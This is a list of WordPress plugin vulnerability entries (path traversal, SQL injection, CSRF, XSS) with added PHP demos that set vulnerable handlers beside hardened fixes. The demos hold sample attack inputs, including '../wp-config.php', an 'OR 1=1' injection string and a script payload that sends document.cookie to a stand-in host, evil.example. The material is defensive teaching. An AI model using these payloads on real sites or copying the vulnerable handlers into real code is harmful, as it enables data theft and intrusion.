
CVE-2025-2048 – Lana Downloads Manager < 1.10.0 - Admin+ Arbitrary File Download via Path Traversal
https://notcve.org/view.php?id=CVE-2025-2048
01 Apr 2025 — The Lana Downloads Manager WordPress plugin before 1.10.0 does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks and download arbitrary files on the server • https://wpscan.com/vulnerability/05c664e8-110e-4a31-8377-41a0422508a7 •
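The defect described in this entry, as an added example that is not code from the Lana Downloads Manager plugin: a download handler that joins a request-supplied file name onto its downloads directory without validation, beside a hardened version that rejects separators and then enforces containment on the canonical path. The function names, the sandbox directory and the file contents are all constructed for the demo.

```php
<?php
// Added example (not plugin code). Constructed sandbox: a downloads directory
// with one legitimate file, and a "config" file one level above it that must
// never be served.
$base = sys_get_temp_dir() . '/dl-demo-' . bin2hex(random_bytes(4));
mkdir("$base/downloads", 0700, true);
file_put_contents("$base/downloads/report.pdf", "public report");
file_put_contents("$base/wp-config.php", "define('DB_PASSWORD', 'secret');");

// Vulnerable: "../wp-config.php" simply resolves to the parent directory.
function download_vulnerable(string $downloadsDir, string $file): ?string
{
    $path = $downloadsDir . '/' . $file;
    return is_file($path) ? file_get_contents($path) : null;
}

// Hardened: reject separators, then canonicalise and enforce containment.
function download_safe(string $downloadsDir, string $file): ?string
{
    // A download manager has no reason to accept a sub-path from the client,
    // so any slash, backslash or NUL byte is rejected outright.
    if ($file === '' || strpbrk($file, "/\\\0") !== false) {
        return null;
    }
    $root = realpath($downloadsDir);
    $path = realpath($downloadsDir . '/' . $file);
    if ($root === false || $path === false) {
        return null;    // directory or file does not exist
    }
    // realpath() has collapsed every ".." and symlink, so a prefix check on
    // the canonical path (with a trailing separator, so "downloads2" does not
    // match "downloads") is a reliable containment test.
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;    // resolved outside the downloads directory
    }
    return is_file($path) ? file_get_contents($path) : null;
}

$attack = '../wp-config.php';

$leaked  = download_vulnerable("$base/downloads", $attack) !== null;
$blocked = download_safe("$base/downloads", $attack) === null;
$served  = download_safe("$base/downloads", 'report.pdf') === 'public report';
printf("vulnerable handler leaked the config: %s\n", $leaked ? 'yes' : 'no');
printf("hardened handler blocked traversal:  %s\n", $blocked ? 'yes' : 'no');
printf("hardened handler still serves files: %s\n", $served ? 'yes' : 'no');

// Remove the sandbox.
unlink("$base/downloads/report.pdf");
unlink("$base/wp-config.php");
rmdir("$base/downloads");
rmdir($base);
```

The separator check alone already stops this payload; the realpath() containment test is kept as well so that a future change which legitimately accepts sub-paths cannot silently reopen the traversal.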

CVE-2025-1986 – Gutentor < 3.4.7 - Admin+ SQL Injection
https://notcve.org/view.php?id=CVE-2025-1986
01 Apr 2025 — The Gutentor WordPress plugin before 3.4.7 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks • https://wpscan.com/vulnerability/f1414750-19ee-4a5d-b255-a9c20168b716 •

CVE-2025-0613 – Photo Gallery < 1.8.34 - Unauthenticated Stored XSS
https://notcve.org/view.php?id=CVE-2025-0613
31 Mar 2025 — The Photo Gallery by 10Web WordPress plugin before 1.8.34 does not sanitise and escape comments added to images by unauthenticated users, leading to an unauthenticated Stored XSS attack when those comments are displayed • https://wpscan.com/vulnerability/22be2b44-cd42-4b02-8448-59dd2989dde1 •

CVE-2025-1762 – Event Tickets with Ticket Scanner < 2.5.4 - Arbitrary Tickets Deletion via CSRF
https://notcve.org/view.php?id=CVE-2025-1762
28 Mar 2025 — The Event Tickets with Ticket Scanner WordPress plugin before 2.5.4 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack • https://wpscan.com/vulnerability/d5cefdee-2ba0-465d-b176-0dff39fc322c •

CVE-2024-13146 – Booknetic < 4.1.5 - Staff Creation via CSRF
https://notcve.org/view.php?id=CVE-2024-13146
26 Mar 2025 — The Booknetic WordPress plugin before 4.1.5 does not have a CSRF check when creating Staff accounts, which could allow attackers to make a logged-in admin add arbitrary Staff members via a CSRF attack • https://wpscan.com/vulnerability/19cb40dd-53b0-46db-beb0-1841e385ce09 •
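The missing check shared by this entry and the Event Tickets with Ticket Scanner one above, as an added example that is not code from either plugin: a state-changing admin handler that relies on the capability check alone, beside one that also requires a per-user, per-action, expiring token. It is a plain-PHP model of what WordPress's wp_nonce_field() and check_admin_referer() provide; inside a real plugin you would call those rather than roll your own. The handler and function names, the action string, the lifetime constant and the secret are all assumptions made for the demo.

```php
<?php
// Added example (not plugin code). A cross-site page can submit a form with
// the admin's cookies attached; what it cannot do is read a token the server
// rendered into the genuine form.

const NONCE_LIFETIME = 12 * 3600;   // seconds a token stays valid (assumed)

// Server-side secret that never leaves the server (constructed for the demo;
// WordPress derives its nonces from the salts in wp-config.php).
$secret = bin2hex(random_bytes(32));

function make_nonce(string $secret, int $userId, string $action, int $now): string
{
    $tick = intdiv($now, NONCE_LIFETIME);
    return hash_hmac('sha256', "$tick|$userId|$action", $secret);
}

function verify_nonce(string $secret, int $userId, string $action, string $nonce, int $now): bool
{
    // Accept the current window and the previous one so a form rendered just
    // before a window boundary still submits cleanly.
    foreach ([0, 1] as $back) {
        $tick = intdiv($now, NONCE_LIFETIME) - $back;
        $expected = hash_hmac('sha256', "$tick|$userId|$action", $secret);
        if (hash_equals($expected, $nonce)) {   // constant-time compare
            return true;
        }
    }
    return false;
}

// Vulnerable handler: authorises by capability only, so a form submitted
// from an attacker's page while the admin is logged in goes through.
function add_staff_vulnerable(array $post, bool $isAdmin, array &$staff): bool
{
    if (!$isAdmin) {
        return false;
    }
    $staff[] = $post['name'];
    return true;
}

// Hardened handler: capability check plus a nonce bound to this user and
// this action. Wrong action, wrong user or expired token all fail.
function add_staff_safe(array $post, bool $isAdmin, int $userId, string $secret, array &$staff): bool
{
    if (!$isAdmin) {
        return false;
    }
    if (!isset($post['_nonce'])
        || !verify_nonce($secret, $userId, 'add_staff', $post['_nonce'], time())) {
        return false;   // missing or forged token: refuse, do not act
    }
    $staff[] = $post['name'];
    return true;
}

$staff   = [];
$adminId = 1;

// Constructed cross-site POST: the attacker knows the field names but has no
// way to obtain the admin's nonce.
$forged = ['name' => 'attacker'];
$vulnAccepted = add_staff_vulnerable($forged, true, $staff);
$safeAccepted = add_staff_safe($forged, true, $adminId, $secret, $staff);

// Genuine submission from a form the server rendered for this admin.
$genuine = ['name' => 'alice', '_nonce' => make_nonce($secret, $adminId, 'add_staff', time())];
$genuineAccepted = add_staff_safe($genuine, true, $adminId, $secret, $staff);

printf("forged POST, vulnerable handler: %s\n", $vulnAccepted ? 'accepted' : 'refused');
printf("forged POST, hardened handler:   %s\n", $safeAccepted ? 'accepted' : 'refused');
printf("genuine POST, hardened handler:  %s\n", $genuineAccepted ? 'accepted' : 'refused');
print_r($staff);
```

Binding the token to the action name matters as much as binding it to the user: a nonce leaked from a harmless "update settings" form must not be replayable against "create staff".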

CVE-2024-12683 – Smart Maintenance Mode < 1.5.2 - Admin+ Stored XSS
https://notcve.org/view.php?id=CVE-2024-12683
26 Mar 2025 — The Smart Maintenance Mode WordPress plugin before 1.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). • https://wpscan.com/vulnerability/1569ee00-56c3-4a1b-940e-e0256a748675 •

CVE-2025-1452 – Favorites < 2.3.5 - Admin+ Stored XSS
https://notcve.org/view.php?id=CVE-2025-1452
25 Mar 2025 — The Favorites WordPress plugin before 2.3.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). • https://wpscan.com/vulnerability/47365daf-7ef5-471a-ab0e-f6d1b40ca56c •

CVE-2025-0717 – Social Slider Feed < 2.2.9 - Admin+ Stored XSS
https://notcve.org/view.php?id=CVE-2025-0717
25 Mar 2025 — To exploit the vulnerability, it is necessary: • https://wpscan.com/vulnerability/31f734fc-d474-46b3-98eb-04761cab8878 •

CVE-2024-9770 – WP-Recall < 16.26.12 - Admin+ SQL Injection
https://notcve.org/view.php?id=CVE-2024-9770
25 Mar 2025 — The WP-Recall WordPress plugin before 16.26.12 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks • https://wpscan.com/vulnerability/d31f8713-b807-4ac4-8897-7d62a93bb2db •
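The defect shared by this entry and the Gutentor one above, as an added example that is not code from either plugin: a request parameter interpolated into SQL text, beside the parameterised query that fixes it. It uses an in-memory SQLite database through PDO so it runs stand-alone; in a WordPress plugin the same fix is $wpdb->prepare() with %d/%s placeholders instead of string interpolation. The table, rows, function names and payload are constructed for the demo.

```php
<?php
// Added example (not plugin code).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Constructed schema: an options table with one public row and one row that
// the query is supposed to filter out.
$db->exec('CREATE TABLE options (option_name TEXT, option_value TEXT, autoload INTEGER)');
$db->exec("INSERT INTO options VALUES ('blogname', 'Demo', 1), ('api_key', 'sk-SECRET', 0)");

// Vulnerable: the parameter reaches the SQL text unchanged, so quotes and
// comment markers in it become part of the statement.
function option_vulnerable(PDO $db, string $name): array
{
    $sql = "SELECT option_name, option_value FROM options "
         . "WHERE option_name = '$name' AND autoload = 1";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the value is bound, so it is only ever compared as data.
function option_safe(PDO $db, string $name): array
{
    $stmt = $db->prepare('SELECT option_name, option_value FROM options '
                       . 'WHERE option_name = ? AND autoload = 1');
    $stmt->execute([$name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed attacker input: closes the string literal, makes the WHERE
// clause always true and comments out the autoload filter.
$payload = "x' OR 1=1 --";

echo "vulnerable, attacker input:\n";
print_r(option_vulnerable($db, $payload));
echo "hardened, attacker input:\n";
print_r(option_safe($db, $payload));
echo "hardened, normal input:\n";
print_r(option_safe($db, 'blogname'));
```

The hardened query never matches the payload because no row is literally named `x' OR 1=1 --`; the vulnerable one returns every row, filter included. An "admin+" SQL injection is still reported because the database user a plugin runs as typically has more reach than the admin role itself, and because the same query pattern tends to be copied into handlers exposed to lower roles.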

CVE-2024-13863 – Stylish Google Sheet Reader < 4.1 - Reflected XSS
https://notcve.org/view.php?id=CVE-2024-13863
25 Mar 2025 — The Stylish Google Sheet Reader 4.0 WordPress plugin before 4.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin • https://wpscan.com/vulnerability/a6161595-0934-4baa-9da6-73792f4b87fd •
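The defect shared by this entry and the stored XSS entries above (Photo Gallery, Smart Maintenance Mode, Favorites), as an added example that is not code from any of those plugins: user-controlled text echoed into HTML without escaping, beside output escaping for the two contexts these bugs usually land in, an element body and a double-quoted attribute value. In WordPress the equivalents are esc_html() and esc_attr(). The rendering functions and payloads are constructed for the demo.

```php
<?php
// Added example (not plugin code). Whether the value came from an
// unauthenticated gallery comment, an admin-only settings field or a query
// parameter reflected back into the page, the fix is the same: escape at the
// point of output for the context the value lands in. The decision must not
// depend on who wrote the value, which is why the "admin+" entries are still
// reported when unfiltered_html is disallowed.

// Vulnerable rendering: stored or reflected text becomes markup.
function render_vulnerable(string $comment, string $title): string
{
    return "<div class=\"comment\" title=\"$title\">$comment</div>";
}

// Escape for an HTML element body or a double-quoted attribute value.
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

function render_safe(string $comment, string $title): string
{
    return '<div class="comment" title="' . esc($title) . '">' . esc($comment) . '</div>';
}

// True when the rendered fragment contains no live tag or attribute boundary
// that originated from the two inputs.
function no_live_markup(string $html): bool
{
    return strpos($html, '<script') === false
        && strpos($html, '" onmouseover') === false;
}

// Constructed payloads for the two contexts: one injects a script element
// into the body, the other closes the attribute and adds an event handler.
$bodyPayload = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>';
$attrPayload = '" onmouseover="alert(1)';

$vuln = render_vulnerable($bodyPayload, $attrPayload);
$safe = render_safe($bodyPayload, $attrPayload);

echo "vulnerable: $vuln\n";
echo "hardened:   $safe\n";
printf("vulnerable output is inert: %s\n", no_live_markup($vuln) ? 'yes' : 'no');
printf("hardened output is inert:   %s\n", no_live_markup($safe) ? 'yes' : 'no');
```

ENT_QUOTES is what makes the attribute case safe: without it a double quote passes through and the `onmouseover` handler becomes part of the element. Values placed inside a URL, a JavaScript string or an inline style need a different escaper for that context; this one covers only HTML text and attribute values.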